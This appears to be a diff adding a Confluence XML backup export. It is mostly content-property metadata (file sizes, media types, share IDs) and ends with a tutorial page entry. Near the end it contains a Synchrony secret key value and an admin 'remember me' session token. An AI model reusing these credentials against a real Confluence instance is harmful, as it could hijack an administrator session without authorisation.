+<property name="name"><![CDATA[HIDDEN]]></property>
+<property name="stringValue"/><property name="longValue">0</property>
+<property name="dateValue"/></object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262256</id>
+<property name="name"><![CDATA[FILESIZE]]></property>
+<property name="stringValue"/><property name="longValue">6988</property>
+<property name="dateValue"/></object>
+<object class="OutgoingLink" package="com.atlassian.confluence.links">
+<id name="id">196609</id>
+<property name="destinationPageTitle"><![CDATA[//youtu.be/RXhL9cfwx2c]]></property>
+<property name="lowerDestinationPageTitle"><![CDATA[//youtu.be/rxhl9cfwx2c]]></property>
+<property name="destinationSpaceKey"><![CDATA[https]]></property>
+<property name="lowerDestinationSpaceKey"><![CDATA[https]]></property>
+<property name="sourceContent" class="Page" package="com.atlassian.confluence.pages"><id name="id">98314</id>
+</property>
+<property name="creationDate">2020-10-26 15:44:29.341</property>
+<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
+</object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262255</id>
+<property name="name"><![CDATA[HIDDEN]]></property>
+<property name="stringValue"/><property name="longValue">0</property>
+<property name="dateValue"/></object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262254</id>
+<property name="name"><![CDATA[MEDIA_TYPE]]></property>
+<property name="stringValue"><![CDATA[image/png]]></property>
+<property name="longValue"/><property name="dateValue"/></object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262253</id>
+<property name="name"><![CDATA[FILESIZE]]></property>
+<property name="stringValue"/><property name="longValue">88136</property>
+<property name="dateValue"/></object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262252</id>
+<property name="name"><![CDATA[MEDIA_TYPE]]></property>
+<property name="stringValue"><![CDATA[image/png]]></property>
+<property name="longValue"/><property name="dateValue"/></object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262251</id>
+<property name="name"><![CDATA[HIDDEN]]></property>
+<property name="stringValue"/><property name="longValue">0</property>
+<property name="dateValue"/></object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262250</id>
+<property name="name"><![CDATA[FILESIZE]]></property>
+<property name="stringValue"/><property name="longValue">2144</property>
+<property name="dateValue"/></object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262249</id>
+<property name="name"><![CDATA[MEDIA_TYPE]]></property>
+<property name="stringValue"><![CDATA[image/jpeg]]></property>
+<property name="longValue"/><property name="dateValue"/></object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262248</id>
+<property name="name"><![CDATA[MINOR_EDIT]]></property>
+<property name="stringValue"/><property name="longValue">1</property>
+<property name="dateValue"/></object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262247</id>
+<property name="name"><![CDATA[FILESIZE]]></property>
+<property name="stringValue"/><property name="longValue">109868</property>
+<property name="dateValue"/></object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262246</id>
+<property name="name"><![CDATA[HIDDEN]]></property>
+<property name="stringValue"/><property name="longValue">0</property>
+<property name="dateValue"/></object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262245</id>
+<property name="name"><![CDATA[MINOR_EDIT]]></property>
+<property name="stringValue"/><property name="longValue">0</property>
+<property name="dateValue"/></object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262244</id>
+<property name="name"><![CDATA[MEDIA_TYPE]]></property>
+<property name="stringValue"><![CDATA[image/png]]></property>
+<property name="longValue"/><property name="dateValue"/></object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262243</id>
+<property name="name"><![CDATA[MEDIA_TYPE]]></property>
+<property name="stringValue"><![CDATA[image/png]]></property>
+<property name="longValue"/><property name="dateValue"/></object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262242</id>
+<property name="name"><![CDATA[MINOR_EDIT]]></property>
+<property name="stringValue"/><property name="longValue">0</property>
+<property name="dateValue"/></object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262241</id>
+<property name="name"><![CDATA[HIDDEN]]></property>
+<property name="stringValue"/><property name="longValue">0</property>
+<property name="dateValue"/></object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262240</id>
+<property name="name"><![CDATA[MEDIA_TYPE]]></property>
+<property name="stringValue"><![CDATA[image/jpeg]]></property>
+<property name="longValue"/><property name="dateValue"/></object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262239</id>
+<property name="name"><![CDATA[FILESIZE]]></property>
+<property name="stringValue"/><property name="longValue">47510</property>
+<property name="dateValue"/></object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262238</id>
+<property name="name"><![CDATA[FILESIZE]]></property>
+<property name="stringValue"/><property name="longValue">3070</property>
+<property name="dateValue"/></object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262237</id>
+<property name="name"><![CDATA[MINOR_EDIT]]></property>
+<property name="stringValue"/><property name="longValue">0</property>
+<property name="dateValue"/></object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262236</id>
+<property name="name"><![CDATA[MINOR_EDIT]]></property>
+<property name="stringValue"/><property name="longValue">0</property>
+<property name="dateValue"/></object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262235</id>
+<property name="name"><![CDATA[MINOR_EDIT]]></property>
+<property name="stringValue"/><property name="longValue">0</property>
+<property name="dateValue"/></object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262234</id>
+<property name="name"><![CDATA[FILESIZE]]></property>
+<property name="stringValue"/><property name="longValue">15296</property>
+<property name="dateValue"/></object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262233</id>
+<property name="name"><![CDATA[FILESIZE]]></property>
+<property name="stringValue"/><property name="longValue">2131</property>
+<property name="dateValue"/></object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262232</id>
+<property name="name"><![CDATA[FILESIZE]]></property>
+<property name="stringValue"/><property name="longValue">9446</property>
+<property name="dateValue"/></object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262231</id>
+<property name="name"><![CDATA[MINOR_EDIT]]></property>
+<property name="stringValue"/><property name="longValue">0</property>
+<property name="dateValue"/></object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262230</id>
+<property name="name"><![CDATA[MEDIA_TYPE]]></property>
+<property name="stringValue"><![CDATA[image/jpeg]]></property>
+<property name="longValue"/><property name="dateValue"/></object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262229</id>
+<property name="name"><![CDATA[FILESIZE]]></property>
+<property name="stringValue"/><property name="longValue">2398</property>
+<property name="dateValue"/></object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262228</id>
+<property name="name"><![CDATA[HIDDEN]]></property>
+<property name="stringValue"/><property name="longValue">0</property>
+<property name="dateValue"/></object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262227</id>
+<property name="name"><![CDATA[MINOR_EDIT]]></property>
+<property name="stringValue"/><property name="longValue">1</property>
+<property name="dateValue"/></object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262226</id>
+<property name="name"><![CDATA[MEDIA_TYPE]]></property>
+<property name="stringValue"><![CDATA[image/jpeg]]></property>
+<property name="longValue"/><property name="dateValue"/></object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262225</id>
+<property name="name"><![CDATA[MEDIA_TYPE]]></property>
+<property name="stringValue"><![CDATA[image/jpeg]]></property>
+<property name="longValue"/><property name="dateValue"/></object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262224</id>
+<property name="name"><![CDATA[HIDDEN]]></property>
+<property name="stringValue"/><property name="longValue">0</property>
+<property name="dateValue"/></object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262223</id>
+<property name="name"><![CDATA[MINOR_EDIT]]></property>
+<property name="stringValue"/><property name="longValue">0</property>
+<property name="dateValue"/></object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262222</id>
+<property name="name"><![CDATA[MINOR_EDIT]]></property>
+<property name="stringValue"/><property name="longValue">1</property>
+<property name="dateValue"/></object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262221</id>
+<property name="name"><![CDATA[MEDIA_TYPE]]></property>
+<property name="stringValue"><![CDATA[image/png]]></property>
+<property name="longValue"/><property name="dateValue"/></object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262220</id>
+<property name="name"><![CDATA[MINOR_EDIT]]></property>
+<property name="stringValue"/><property name="longValue">0</property>
+<property name="dateValue"/></object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262219</id>
+<property name="name"><![CDATA[FILESIZE]]></property>
+<property name="stringValue"/><property name="longValue">7054</property>
+<property name="dateValue"/></object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262218</id>
+<property name="name"><![CDATA[HIDDEN]]></property>
+<property name="stringValue"/><property name="longValue">0</property>
+<property name="dateValue"/></object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262217</id>
+<property name="name"><![CDATA[HIDDEN]]></property>
+<property name="stringValue"/><property name="longValue">0</property>
+<property name="dateValue"/></object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262216</id>
+<property name="name"><![CDATA[MINOR_EDIT]]></property>
+<property name="stringValue"/><property name="longValue">0</property>
+<property name="dateValue"/></object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262215</id>
+<property name="name"><![CDATA[FILESIZE]]></property>
+<property name="stringValue"/><property name="longValue">12098</property>
+<property name="dateValue"/></object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262214</id>
+<property name="name"><![CDATA[FILESIZE]]></property>
+<property name="stringValue"/><property name="longValue">27998</property>
+<property name="dateValue"/></object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262213</id>
+<property name="name"><![CDATA[FILESIZE]]></property>
+<property name="stringValue"/><property name="longValue">41645</property>
+<property name="dateValue"/></object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262212</id>
+<property name="name"><![CDATA[HIDDEN]]></property>
+<property name="stringValue"/><property name="longValue">0</property>
+<property name="dateValue"/></object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262211</id>
+<property name="name"><![CDATA[MINOR_EDIT]]></property>
+<property name="stringValue"/><property name="longValue">1</property>
+<property name="dateValue"/></object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262210</id>
+<property name="name"><![CDATA[MEDIA_TYPE]]></property>
+<property name="stringValue"><![CDATA[image/png]]></property>
+<property name="longValue"/><property name="dateValue"/></object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262209</id>
+<property name="name"><![CDATA[MINOR_EDIT]]></property>
+<property name="stringValue"/><property name="longValue">1</property>
+<property name="dateValue"/></object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262208</id>
+<property name="name"><![CDATA[MEDIA_TYPE]]></property>
+<property name="stringValue"><![CDATA[image/png]]></property>
+<property name="longValue"/><property name="dateValue"/></object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262207</id>
+<property name="name"><![CDATA[FILESIZE]]></property>
+<property name="stringValue"/><property name="longValue">264209</property>
+<property name="dateValue"/></object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262206</id>
+<property name="name"><![CDATA[MEDIA_TYPE]]></property>
+<property name="stringValue"><![CDATA[image/jpeg]]></property>
+<property name="longValue"/><property name="dateValue"/></object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262205</id>
+<property name="name"><![CDATA[MEDIA_TYPE]]></property>
+<property name="stringValue"><![CDATA[image/png]]></property>
+<property name="longValue"/><property name="dateValue"/></object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262204</id>
+<property name="name"><![CDATA[FILESIZE]]></property>
+<property name="stringValue"/><property name="longValue">2398</property>
+<property name="dateValue"/></object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262203</id>
+<property name="name"><![CDATA[HIDDEN]]></property>
+<property name="stringValue"/><property name="longValue">0</property>
+<property name="dateValue"/></object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262202</id>
+<property name="name"><![CDATA[MINOR_EDIT]]></property>
+<property name="stringValue"/><property name="longValue">0</property>
+<property name="dateValue"/></object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262201</id>
+<property name="name"><![CDATA[MINOR_EDIT]]></property>
+<property name="stringValue"/><property name="longValue">1</property>
+<property name="dateValue"/></object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262200</id>
+<property name="name"><![CDATA[macro-create-events-published-for-version]]></property>
+<property name="stringValue"/><property name="longValue">8</property>
+<property name="dateValue"/></object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262199</id>
+<property name="name"><![CDATA[MINOR_EDIT]]></property>
+<property name="stringValue"/><property name="longValue">1</property>
+<property name="dateValue"/></object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262198</id>
+<property name="name"><![CDATA[FILESIZE]]></property>
+<property name="stringValue"/><property name="longValue">21488</property>
+<property name="dateValue"/></object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262197</id>
+<property name="name"><![CDATA[macroNames]]></property>
+<property name="stringValue"/><property name="longValue"/><property name="dateValue"/></object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262196</id>
+<property name="name"><![CDATA[HIDDEN]]></property>
+<property name="stringValue"/><property name="longValue">0</property>
+<property name="dateValue"/></object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262195</id>
+<property name="name"><![CDATA[share-id]]></property>
+<property name="stringValue"><![CDATA[32b657a6-50f7-4a6a-aaea-102ce537c268]]></property>
+<property name="longValue"/><property name="dateValue"/></object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262194</id>
+<property name="name"><![CDATA[share-id]]></property>
+<property name="stringValue"><![CDATA[c9c2e2a4-8ebc-476f-aff1-014fe92e22ec]]></property>
+<property name="longValue"/><property name="dateValue"/></object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262193</id>
+<property name="name"><![CDATA[share-id]]></property>
+<property name="stringValue"><![CDATA[d065f4f3-da57-4410-aa7b-7ff93e59a719]]></property>
+<property name="longValue"/><property name="dateValue"/></object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262192</id>
+<property name="name"><![CDATA[share-id]]></property>
+<property name="stringValue"><![CDATA[498beede-3b1d-477a-8d5a-3dea256d4fa2]]></property>
+<property name="longValue"/><property name="dateValue"/></object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262191</id>
+<property name="name"><![CDATA[share-id]]></property>
+<property name="stringValue"><![CDATA[8c741dfa-dc55-4d7e-ac8c-d3aba5a29f2a]]></property>
+<property name="longValue"/><property name="dateValue"/></object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262190</id>
+<property name="name"><![CDATA[share-id]]></property>
+<property name="stringValue"><![CDATA[9092f143-f878-4fd8-9300-7bcecd02dd02]]></property>
+<property name="longValue"/><property name="dateValue"/></object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262189</id>
+<property name="name"><![CDATA[share-id]]></property>
+<property name="stringValue"><![CDATA[576b0d46-e5b1-4ee9-9b58-c688fc240c65]]></property>
+<property name="longValue"/><property name="dateValue"/></object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262188</id>
+<property name="name"><![CDATA[share-id]]></property>
+<property name="stringValue"><![CDATA[c5547696-df60-4a59-96b4-355de741a34a]]></property>
+<property name="longValue"/><property name="dateValue"/></object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262187</id>
+<property name="name"><![CDATA[share-id]]></property>
+<property name="stringValue"><![CDATA[25c3f4c7-6755-4974-aa96-0cad5b648190]]></property>
+<property name="longValue"/><property name="dateValue"/></object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262186</id>
+<property name="name"><![CDATA[share-id]]></property>
+<property name="stringValue"><![CDATA[323e5bdf-f804-4867-920e-b006c9f2aa23]]></property>
+<property name="longValue"/><property name="dateValue"/></object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262185</id>
+<property name="name"><![CDATA[macroNames]]></property>
+<property name="stringValue"><![CDATA[widget]]></property>
+<property name="longValue"/><property name="dateValue"/></object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262184</id>
+<property name="name"><![CDATA[share-id]]></property>
+<property name="stringValue"><![CDATA[30ea9299-b7f7-48f4-b0b2-00d4d0b720d8]]></property>
+<property name="longValue"/><property name="dateValue"/></object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262183</id>
+<property name="name"><![CDATA[macro-create-events-published-for-version]]></property>
+<property name="stringValue"/><property name="longValue">1</property>
+<property name="dateValue"/></object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262182</id>
+<property name="name"><![CDATA[macroNames]]></property>
+<property name="stringValue"/><property name="longValue"/><property name="dateValue"/></object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262181</id>
+<property name="name"><![CDATA[share-id]]></property>
+<property name="stringValue"><![CDATA[79351706-62d9-47b2-902e-d7f635e020b1]]></property>
+<property name="longValue"/><property name="dateValue"/></object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262180</id>
+<property name="name"><![CDATA[share-id]]></property>
+<property name="stringValue"><![CDATA[8c60c7b5-70b7-4d89-988a-b47459b91c6d]]></property>
+<property name="longValue"/><property name="dateValue"/></object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262179</id>
+<property name="name"><![CDATA[share-id]]></property>
+<property name="stringValue"><![CDATA[ad00c983-c9e3-46ab-90a4-42d016a162e5]]></property>
+<property name="longValue"/><property name="dateValue"/></object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262178</id>
+<property name="name"><![CDATA[share-id]]></property>
+<property name="stringValue"><![CDATA[aa14dd02-a368-4c44-b5a5-b997c6d519c5]]></property>
+<property name="longValue"/><property name="dateValue"/></object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262177</id>
+<property name="name"><![CDATA[share-id]]></property>
+<property name="stringValue"><![CDATA[2c73ae66-3422-43d3-8867-b99be3fd153d]]></property>
+<property name="longValue"/><property name="dateValue"/></object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262176</id>
+<property name="name"><![CDATA[share-id]]></property>
+<property name="stringValue"><![CDATA[b19a726e-f021-4386-a33a-cc4134368b29]]></property>
+<property name="longValue"/><property name="dateValue"/></object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262175</id>
+<property name="name"><![CDATA[share-id]]></property>
+<property name="stringValue"><![CDATA[be8deba8-e975-4ea2-9817-94db937c8a42]]></property>
+<property name="longValue"/><property name="dateValue"/></object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262174</id>
+<property name="name"><![CDATA[share-id]]></property>
+<property name="stringValue"><![CDATA[3c2f37c4-e102-4d53-be59-7e0ebbc80d37]]></property>
+<property name="longValue"/><property name="dateValue"/></object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262173</id>
+<property name="name"><![CDATA[share-id]]></property>
+<property name="stringValue"><![CDATA[bdb695aa-ffc0-4544-b601-08618dfe3f43]]></property>
+<property name="longValue"/><property name="dateValue"/></object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262172</id>
+<property name="name"><![CDATA[share-id]]></property>
+<property name="stringValue"><![CDATA[0e76d5df-8079-47bd-afe7-a90d92922657]]></property>
+<property name="longValue"/><property name="dateValue"/></object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262171</id>
+<property name="name"><![CDATA[share-id]]></property>
+<property name="stringValue"><![CDATA[f8ae6dc9-0915-416e-bd0c-2c2aed6f19c6]]></property>
+<property name="longValue"/><property name="dateValue"/></object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262170</id>
+<property name="name"><![CDATA[share-id]]></property>
+<property name="stringValue"><![CDATA[b41a9868-a5c0-4bd1-84c6-93910fcd12f6]]></property>
+<property name="longValue"/><property name="dateValue"/></object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262169</id>
+<property name="name"><![CDATA[share-id]]></property>
+<property name="stringValue"><![CDATA[20018262-63f0-4469-89b6-d52cce7086b2]]></property>
+<property name="longValue"/><property name="dateValue"/></object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262168</id>
+<property name="name"><![CDATA[share-id]]></property>
+<property name="stringValue"><![CDATA[1c198386-7ec9-48dd-a514-bbba0c4835e4]]></property>
+<property name="longValue"/><property name="dateValue"/></object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262167</id>
+<property name="name"><![CDATA[macro-create-events-published-for-version]]></property>
+<property name="stringValue"/><property name="longValue">9</property>
+<property name="dateValue"/></object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262166</id>
+<property name="name"><![CDATA[macro-create-events-published-for-version]]></property>
+<property name="stringValue"/><property name="longValue">8</property>
+<property name="dateValue"/></object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262165</id>
+<property name="name"><![CDATA[macroNames]]></property>
+<property name="stringValue"/><property name="longValue"/><property name="dateValue"/></object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262164</id>
+<property name="name"><![CDATA[macro-create-events-published-for-version]]></property>
+<property name="stringValue"/><property name="longValue">4</property>
+<property name="dateValue"/></object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262163</id>
+<property name="name"><![CDATA[macro-create-events-published-for-version]]></property>
+<property name="stringValue"/><property name="longValue">1</property>
+<property name="dateValue"/></object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262162</id>
+<property name="name"><![CDATA[macro-create-events-published-for-version]]></property>
+<property name="stringValue"/><property name="longValue">12</property>
+<property name="dateValue"/></object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262161</id>
+<property name="name"><![CDATA[macroNames]]></property>
+<property name="stringValue"/><property name="longValue"/><property name="dateValue"/></object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262160</id>
+<property name="name"><![CDATA[macroNames]]></property>
+<property name="stringValue"/><property name="longValue"/><property name="dateValue"/></object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262159</id>
+<property name="name"><![CDATA[share-id]]></property>
+<property name="stringValue"><![CDATA[97a52591-901b-4e26-b38c-23180d68189c]]></property>
+<property name="longValue"/><property name="dateValue"/></object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262158</id>
+<property name="name"><![CDATA[macro-create-events-published-for-version]]></property>
+<property name="stringValue"/><property name="longValue">1</property>
+<property name="dateValue"/></object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262157</id>
+<property name="name"><![CDATA[share-id]]></property>
+<property name="stringValue"><![CDATA[566640c6-aa91-41f4-ba6b-7d02dc9ef2e4]]></property>
+<property name="longValue"/><property name="dateValue"/></object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262156</id>
+<property name="name"><![CDATA[macroNames]]></property>
+<property name="stringValue"/><property name="longValue"/><property name="dateValue"/></object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262155</id>
+<property name="name"><![CDATA[macro-create-events-published-for-version]]></property>
+<property name="stringValue"/><property name="longValue">3</property>
+<property name="dateValue"/></object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262154</id>
+<property name="name"><![CDATA[macro-create-events-published-for-version]]></property>
+<property name="stringValue"/><property name="longValue">5</property>
+<property name="dateValue"/></object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262153</id>
+<property name="name"><![CDATA[macro-create-events-published-for-version]]></property>
+<property name="stringValue"/><property name="longValue">6</property>
+<property name="dateValue"/></object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262152</id>
+<property name="name"><![CDATA[macroNames]]></property>
+<property name="stringValue"/><property name="longValue"/><property name="dateValue"/></object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262151</id>
+<property name="name"><![CDATA[macro-create-events-published-for-version]]></property>
+<property name="stringValue"/><property name="longValue">7</property>
+<property name="dateValue"/></object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262150</id>
+<property name="name"><![CDATA[macro-count.widget]]></property>
+<property name="stringValue"><![CDATA[9-2]]></property>
+<property name="longValue"/><property name="dateValue"/></object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262149</id>
+<property name="name"><![CDATA[macro-create-events-published-for-version]]></property>
+<property name="stringValue"/><property name="longValue">14</property>
+<property name="dateValue"/></object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262148</id>
+<property name="name"><![CDATA[share-id]]></property>
+<property name="stringValue"><![CDATA[c6887e71-b34a-4cf8-b4d4-36b53ff35592]]></property>
+<property name="longValue"/><property name="dateValue"/></object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262147</id>
+<property name="name"><![CDATA[share-id]]></property>
+<property name="stringValue"><![CDATA[881dbc25-a20d-4773-b5a8-2a402abcfd9d]]></property>
+<property name="longValue"/><property name="dateValue"/></object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262146</id>
+<property name="name"><![CDATA[share-id]]></property>
+<property name="stringValue"><![CDATA[34cd463c-b2be-49e6-9006-62679d6a59f1]]></property>
+<property name="longValue"/><property name="dateValue"/></object>
+<object class="ContentProperty" package="com.atlassian.confluence.content">
+<id name="id">262145</id>
+<property name="name"><![CDATA[share-id]]></property>
+<property name="stringValue"><![CDATA[8b24739b-eaaa-404e-8897-e347c68f3974]]></property>
+<property name="longValue"/><property name="dateValue"/></object>
+<object class="Secrets" package="com.atlassian.synchrony">
+<id name="key"><![CDATA[Synchrony-0fccd6a4-3e18-398a-8fe4-ff41cdd6c7ad-debug]]></id>
+<property name="value"><![CDATA[ZmUL2wyLlx8ROyTY/satsTeR2J61ADRUqTnTe8Ai1og=]]></property>
+</object>
+<object class="ConfluenceRememberMeToken" package="com.atlassian.confluence.user.persistence.dao">
+<id name="id">622593</id>
+<property name="username"><![CDATA[admin]]></property>
+<property name="createdTime">1699509859137</property>
+<property name="token"><![CDATA[d24ab7e045f654b651978d7fb48f0ce945461128]]></property>
+</object>
+<object class="InternalUserAttribute" package="com.atlassian.crowd.model.user">
+<id name="id">557060</id>
+<property name="user" class="InternalUser" package="com.atlassian.crowd.model.user"><id name="id">491521</id>
+</property>
+<property name="directory" class="DirectoryImpl" package="com.atlassian.crowd.model.directory"><id name="id">360449</id>
+</property>
+<property name="name"><![CDATA[lastAuthenticated]]></property>
+<property name="value"><![CDATA[1699509892791]]></property>
+<property name="lowerValue"><![CDATA[1699509892791]]></property>
+</object>
+<object class="InternalUserAttribute" package="com.atlassian.crowd.model.user">
+<id name="id">557059</id>
+<property name="user" class="InternalUser" package="com.atlassian.crowd.model.user"><id name="id">491521</id>
+</property>
+<property name="directory" class="DirectoryImpl" package="com.atlassian.crowd.model.directory"><id name="id">360449</id>
+</property>
+<property name="name"><![CDATA[passwordLastChanged]]></property>
+<property name="value"><![CDATA[1699509858738]]></property>
+<property name="lowerValue"><![CDATA[1699509858738]]></property>
+</object>
+<object class="InternalUserAttribute" package="com.atlassian.crowd.model.user">
+<id name="id">557058</id>
+<property name="user" class="InternalUser" package="com.atlassian.crowd.model.user"><id name="id">491521</id>
+</property>
+<property name="directory" class="DirectoryImpl" package="com.atlassian.crowd.model.directory"><id name="id">360449</id>
+</property>
+<property name="name"><![CDATA[invalidPasswordAttempts]]></property>
+<property name="value"><![CDATA[0]]></property>
+<property name="lowerValue"><![CDATA[0]]></property>
+</object>
+<object class="InternalUserAttribute" package="com.atlassian.crowd.model.user">
+<id name="id">557057</id>
+<property name="user" class="InternalUser" package="com.atlassian.crowd.model.user"><id name="id">491521</id>
+</property>
+<property name="directory" class="DirectoryImpl" package="com.atlassian.crowd.model.directory"><id name="id">360449</id>
+</property>
+<property name="name"><![CDATA[requiresPasswordChange]]></property>
+<property name="value"><![CDATA[false]]></property>
+<property name="lowerValue"><![CDATA[false]]></property>
+</object>
+<object class="Page" package="com.atlassian.confluence.pages">
+<id name="id">98306</id>
+<property name="hibernateVersion">37</property>
+<property name="title"><![CDATA[Share your page with a team member (step 9 of 9)]]></property>
+<property name="lowerTitle"><![CDATA[share your page with a team member (step 9 of 9)]]></property>
+<collection name="bodyContents" class="java.util.Collection"><element class="BodyContent" package="com.atlassian.confluence.core"><id name="id">163845</id>
+</element>
+</collection>
